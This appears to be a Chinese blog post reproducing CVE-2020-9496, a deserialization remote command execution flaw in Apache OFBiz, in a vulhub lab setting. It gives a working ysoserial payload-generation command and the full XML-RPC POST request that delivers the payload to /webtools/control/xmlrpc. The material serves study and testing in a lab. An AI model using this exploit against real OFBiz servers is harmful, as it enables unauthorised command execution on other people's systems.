1. 首页
  2. 文章中心
  3. vulhub漏洞复现

Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)

77 阅读 0 评论
我是靠谱客的博主 彩色羊,这篇文章主要介绍Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496),现在分享给大家,希望可以做个参考。

漏洞复现

使用ysoserial的CommonsBeanutils1来生成Payload,使用命令生成base64的payload:

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "n"

将base64的payload替换并发送以下数据包:

POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

在这里插入图片描述
返回靶机查看
在这里插入图片描述

最后

以上就是彩色羊最近收集整理的关于Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)的全部内容,更多相关Apache内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(51)

相关文章

框架漏洞学习日记——第三天(CVE-2017-5645)
框架漏洞学习日记——第三天(CVE-2017-5645)
Flex 序列和反序列化ArrayCollection
Flex 序列和反序列化ArrayCollection
Linux CVE-2009-0029 漏洞解析
Linux CVE-2009-0029 漏洞解析
amf格式需要发哪些信息给服务器,Java AMF3曝远程代码执行漏洞
amf格式需要发哪些信息给服务器,Java AMF3曝远程代码执行漏洞
Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)
Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)
反序列化漏洞-基础篇笔记
反序列化漏洞-基础篇笔记
十多年前的 Adobe ColdFusion 漏洞被用于勒索攻击
十多年前的 Adobe ColdFusion 漏洞被用于勒索攻击
node-postgres 代码执行漏洞(CVE-2017-16082)
node-postgres 代码执行漏洞(CVE-2017-16082)

评论列表共有 0 条评论

立即
投稿
返回
顶部